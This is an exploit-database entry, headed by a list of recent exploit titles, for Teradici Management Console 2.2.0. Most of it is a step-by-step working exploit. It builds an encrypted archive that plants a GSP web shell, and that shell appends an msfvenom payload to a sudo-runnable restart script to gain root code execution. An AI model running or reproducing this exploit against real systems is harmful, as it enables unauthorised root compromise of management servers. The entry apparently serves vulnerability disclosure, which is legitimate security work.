
13 new exploits EasyCom For PHP 4.0.0 - Buffer Overflow (PoC) EasyCom For PHP 4.0.0 - Denial of Service Google Chrome - 'layout' Out-of-Bounds Read Shutter 0.93.1 - Code Execution DiskSavvy Enterprise - GET Buffer Overflow (Metasploit) Disk Savvy Enterprise - GET Buffer Overflow (Metasploit) Disk Savvy Enterprise 9.4.18 - Buffer Overflow (SEH) Joomla! Component ContentMap 1.3.8 - 'contentid' Parameter SQL Injection Joomla! Component VehicleManager 3.9 - SQL Injection Joomla! Component RealEstateManager 3.9 - SQL Injection Joomla! Component BookLibrary 3.6.1 - SQL Injection Joomla! Component MediaLibrary Basic 3.5 - SQL Injection Lock Photos Album&Videos Safe 4.3 - Directory Traversal ProjectSend r754 - Insecure Direct Object Reference Teradici Management Console 2.2.0 - Privilege Escalation
66 lines
No EOL
2.6 KiB
Text
Executable file
66 lines
No EOL
2.6 KiB
Text
Executable file
# Exploit Title: Teradici Management Console 2.2.0 - Web Shell Upload and Privilege Escalation
|
|
# Date: February 22nd, 2017
|
|
# Exploit Author: hantwister
|
|
# Vendor Homepage: http://www.teradici.com/products-and-solutions/pcoip-products/management-console
|
|
# Software Link: https://techsupport.teradici.com/ics/support/DLRedirect.asp?fileID=63583 (login required)
|
|
# Version: 2.2.0
|
|
|
|
|
|
Users that can access the Settings > Database Management page can achieve code
|
|
execution as root on older versions of PCoIP MC 2.x. (Based on CentOS 7 x64)
|
|
|
|
|
|
Web Shell Upload Vulnerability Overview
|
|
---------------------------------------
|
|
|
|
Database archives are extracted under /opt/jetty/tmpdeploy. By creating a
|
|
malicious archive with a malicious web script that extracts to the known
|
|
directory /opt/jetty/tmpdeploy/jetty-0.0.0.0-8080-console.war-_console-any-
|
|
it is possible to add or modify class files and XML files pertaining to the
|
|
application.
|
|
|
|
|
|
Privilege Escalation Vulnerability Overview
|
|
-------------------------------------------
|
|
|
|
The jetty user owns the file /opt/jetty/jetty_self_restart.sh, and the same user
|
|
has sudo rights to run that file without a password. By manipulating this file,
|
|
arbitrary code can be run as root.
|
|
|
|
|
|
Exploiting The Vulnerabilities
|
|
------------------------------
|
|
|
|
alice:~$ mkdir -p runasroot/jetty-0.0.0.0-8080-console.war-_console-any-/webapp/images
|
|
alice:~$ cd runasroot
|
|
alice:~/runasroot$ msfvenom (snip) > evil
|
|
alice:~/runasroot$ chmod a+x evil
|
|
alice:~/runasroot$ nano modify_self_restart.sh
|
|
|
|
#!/bin/bash
|
|
echo /tmp/evil >> /opt/jetty/jetty_self_restart.sh
|
|
|
|
alice:~/runasroot$ chmod a+x modify_self_restart.sh
|
|
alice:~/runasroot$ cd jetty-0.0.0.0-8080-console.war-_console-any-/webapp/images
|
|
alice:~/runasroot/jetty-0.0.0.0-8080-console.war-_console-any-/webapp/images$ nano runasroot.gsp
|
|
|
|
<html>
|
|
<head>
|
|
<title>runasroot</title>
|
|
</head>
|
|
<body>
|
|
<pre>
|
|
<% out << "cp /opt/jetty/tmpdeploy/evil /tmp/".execute().text %>
|
|
<% out << "/opt/jetty/tmpdeploy/modify_self_restart.sh".execute().text %>
|
|
<% out << "sudo /opt/jetty/jetty_self_restart.sh".execute().text %>
|
|
</pre>
|
|
</body>
|
|
</html>
|
|
|
|
alice:~/runasroot/jetty-0.0.0.0-8080-console.war-_console-any-/webapp/images$ cd ../../..
|
|
alice:~/runasroot$ tar -zcf runasroot.tar.gz evil modify_self_restart.sh jetty-0.0.0.0-8080-console.war-_console-any-
|
|
alice:~/runasroot$ openssl enc -e -aes-256-cbc -salt -in runasroot.tar.gz -out runasroot.archive -pass pass:4400Dominion -p
|
|
|
|
Now, choose to upload runasroot.archive through the Database Management page. An
|
|
error will be displayed that it wasn't a valid archive. Now, navigate to
|
|
https://IP/console/images/runasroot.gsp |